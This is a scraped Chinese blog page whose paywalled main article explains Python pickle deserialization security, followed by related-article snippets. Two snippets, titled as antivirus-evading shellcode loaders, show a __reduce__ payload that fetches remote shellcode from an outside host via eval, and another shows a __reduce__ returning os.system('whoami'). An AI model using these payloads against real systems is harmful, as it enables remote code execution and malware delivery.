python反序列化总结_Python 反序列化安全问题(二)

最新推荐文章于 2022-04-03 11:12:32 发布
最新推荐文章于 2022-04-03 11:12:32 发布
阅读量157 收藏
点赞数
文章标签: python反序列化总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39884738/article/details/111427833
版权

python pickle允许类定义__reduce__方法来声明如何进行序列化。其返回字符串或者tuple,前者可能代表着一个python的全局变量的名称,后者则是描述在反序列化过程中如何进行重构。安全问题也是主要出在后者,本文主要针对于该情况进行pickle模块源码分析。

一、源码分析

代码结构可以分为:基础变量、自定义异常类、操作变量、序列化以及反序列化类以及普通函数。

1.1 基础变量

代码(28-57行)最先定义了部分变量,如最高协议号还有代码中使用了struct.pack()以及marshal.loads()进行序列化和反序列化,并且解释了为何用这两个函数。

1.2 自定义异常类

代码(59-85行)中自定义了4个异常类,分别为PickleError、PicklingError、UnpicklingError以及_Stop.

PickleError:PickingError和UnpicklingError的基类

PicklingError:序列化过程中异常

UnpicklingError:反序列化过程中异常

_Stop:在反序列化过程中结尾处触发该异常

1.3 操作变量

代码(99-126行)定义了操作变量,我们可以理解为操作指令,每一个变量都对应着相关操作,这些指令在序列化的过程中写入,然后在反序列化过程中读取进行对应操作;我们主要理解如下操作指令。

c:读取新的一行作为模块名module,读取下一行作为对象名object,然后将module.object压入到堆栈中。

p:将堆栈中索引为-1的对应存储入内存。

(:将一个标记对象插入到堆栈中。

t:构建

最低0.47元/天 解锁文章
weixin_39884738
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析Python 序列化与反序列化
09-16
主要介绍了Python 序列化与反序列化的相关资料,文中讲解非常细致,代码帮助大家更好的理解和学习,感兴趣的朋友可以了解下
Python pickle 中的 POP 指令码
Python_xiaowu的博客
01-15 746
事情起源于笔者 2019 年的一篇文章: 从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 前言 不经意间就起了这么长一个题目。昨晚用了4h左右的时间看皮ckle源码(主要是_Unpickler部分),发掘出了几种新的漏洞利用方式,目前网上暂未见资料,因此我们决定写一篇文章分享一下。本文详细介绍了pyckle.l... 正在上传…重新上传取消​知乎专栏阮行止上海洛谷网络科技有限公司 讲师 文中提到,注入恶意对象引发 RCE 之后,常常由于返..
介绍Python的魔术方法 - Magic Method
guankangqiang的博客
05-18 346
转:https://segmentfault.com/a/1190000007256392前言在Python中,所有以"__"双下划线包起来的方法,都统称为"魔术方法"。比如我们接触最多的__init__.有些魔术方法,我们可能以后一辈子都不会再遇到了,这里也就只是简单介绍下;而有些魔术方法,巧妙使用它可以构造出非常优美的代码,比如将复杂的逻辑封装成简单的API。本文编辑的思路借鉴自Rafe Ke...
python __reduce__魔法方法_Python魔法方法指南
weixin_39973271的博客
11-28 278
(译)Python魔法方法指南简介本指南归纳于我的几个月的博客,主题是 魔法方法 。什么是魔法方法呢?它们在面向对象的Python的处处皆是。它们是一些可以让你对类添加“魔法”的特殊方法。它们经常是两个下划线包围来命名的(比如 __init__ , __lt__ )。但是现在没有很好的文档来解释它们。所有的魔法方法都会在Python的官方文档中找到,但是它们组织松散。而且很少会有示例(有的是无聊的...
python生成shellcode加载器(免杀,可过杀软)
u010508029的博客
05-31 3736
import ctypes, cPickle, base64, urllib2 class ptr(object): def __reduce__(self): return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64 class buf(object): def __init__(self, shellcode): sel.
python标准输出_python实时获取标准输出
weixin_39887961的博客
11-24 255
我现在用multiprocessing和Queue来实现实时获取一个app的标准输出,同时监视app是否hang。下面是代码import subprocessimport timeimport multiprocessingimport Queuedef generator(q):pipe = subpross.Popen("ping 10.231.198.120 -t", stdout=subp...
python魔法方法有啥用-python的常用魔法方法详细总结
weixin_39621044的博客
11-11 243
__init__我们很熟悉了,它在对象初始化的时候调用,我们一般将它理解为"构造函数".实际上, 当我们调用x = SomeClass()的时候调用,__init__并不是第一个执行的, __new__才是。所以准确来说,是__new__和__init__共同构成了"构造函数".__new__是用来创建类并返回这个类的实例, 而__init__只是将传入的参...
python编写shellcode_python生成shellcode加载器
weixin_39763293的博客
12-19 468
import ctypes, cPickle, base64, urllib2class ptr(object):def __reduce__(self):return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object):def __init...
python的reduce()函数
baidu_24545901的博客
11-30 325
reduce()函数也是Python内置的一个高阶函数。 reduce()函数接收的参数和 map()类似,一个函数 f,一个list,但行为和 map()不同,reduce()传入的函数 f 必须接收两个参数,reduce()对list的每个元素反复调用函数f,并返回最终结果值。 例如,编写一个f函数,接收x和y,返回x和y的和: 1 2
python序列化反序列化和异常处理笔记.doc
10-01
python序列化反序列化和异常处理笔记
Python Json序列化与反序列化的示例
09-20
主要介绍了Python Json序列化与反序列化的示例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
python3序列化与反序列化用法实例
09-22
主要介绍了python3序列化与反序列化用法,实例分析了Python3使用pickle模块针对字符串进行序列化操作的相关技巧,需要的朋友可以参考下
Python中shelve序列化与反序列化
12-22
序列化/反序列化 将对象转换为可通过网络传输或可以存储到本地磁盘的数据格式(如:XML、JSON或特定格式的字节串)的过程称为序列化;反之,则称为反序列化 shelve shelve是一个简单的数据存储方案,类似key-value...
python 反序列化
m0_62970186的博客
04-03 5348
python 反序列化
AttributeError: Can‘t get attribute ‘SPPF‘ on <module ‘models.common‘ from ‘H:\\yolov5-5.0\\models\\
热门推荐
weixin_50920579的博客
11-13 2万+
yolo报错 解决方案:model/common.py里面去找到这个SPPF的类,把它拷过来到你这个Tags5的model/common.py里面,这样你的代码就也有这个类了,还要引入一个warnings包就行了! 有的同学找不到SPPF这个类,那我现在直接粘贴在这里,你们只需要复制到你们的common.py里面即可,记得把import warnings放在上面去: import warnings class SPPF(nn.Module): # Spatial Pyramid Poolin
python魔法方法意义_Python 魔法方法总结
weixin_39670511的博客
11-27 301
魔法方法魔法方法是python十分强大的一个特性,他允许我们自定义类的行为,从而实现各种功能,只要实现了对应的魔法方法,那么在进行指定的操作时,python解释器就会自动去调用这些方法,这些方法一般都是以双下划线__开头和结尾。(魔法方法也可以看做是一种python协议,其和类本身没有关系,他是python解释器可以直接调用的方法)使用注意魔法方法是针对于类对象的方法特性,python虚拟机在对一...
python __reduce__魔法方法_非常全的通俗易懂 Python 魔法方法指南(下)
weixin_39560066的博客
11-28 1520
点击上方“咸鱼学Python”,选择“加为星标”第一时间关注Python技术干货!作者:Rafe Kettler翻译:hit9来源:https://pyzh.readthedocs.io/en/latest/python-magic-methods-guide.html06. 反射你可以通过定义魔法方法来控制用于反射的内建函数 isinstance 和 issubclass 的行为。下面是对应的魔...
python框架漏洞_Django框架的一些漏洞
weixin_39642761的博客
12-14 744
首先我们先来了解一下python中的序列号模板 pickle 这里以一段代码为例子import base64import pickleclass cmd(object):def __reduce__(self):import osreturn (os.system, ('whoami', ))sersize=base64.b64encode(pickle.dumps(cmd()))print se...
综合集团数字化转型顶层设计思路.pptx
最新发布
06-14
综合集团数字化转型顶层设计思路.pptx
python反序列化
07-31
Python中的反序列化是指将序列化后的数据重新转化为原始的Python对象。在Python中,可以使用json模块的loads方法来进行...总结起来,Python中的反序列化是通过json模块的loads方法将JSON字符串转化为对应的Python对象。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值